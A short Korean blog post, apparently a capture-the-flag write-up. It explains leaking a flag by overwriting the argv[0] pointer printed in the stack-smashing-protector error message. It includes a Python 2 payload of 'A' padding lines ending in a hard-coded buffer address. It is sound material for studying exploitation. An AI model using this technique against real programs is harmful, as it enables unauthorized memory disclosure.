SSP에서 stack smashing detected 뒤에 나오는 argv[0]포인터를 FLAG 버퍼로 변조하면 된다
1 2 3 4 5 6 7 8 9 10 11 12 | sc = "kk\n" sc +="A"*384+"\n" sc +="A"*383+"\n" sc +="A"*382+"\n" sc +="A"*381+"\n" sc +="A"*380+"\n" sc +="A"*379+"\n" sc +="A"*378+"\n" sc +="A"*377+"\n" sc +="A"*376+"\xc0\x10\x60\x00\n" sc +="yes\na\n" print sc | cs |
'CTF' 카테고리의 다른 글
codegate 2017 (0) | 2017.02.11 |
---|---|
SECCON_2016 logger (0) | 2016.12.14 |
SECCON_2016 cheer (0) | 2016.12.11 |
SECCON_2016 jmper (0) | 2016.12.11 |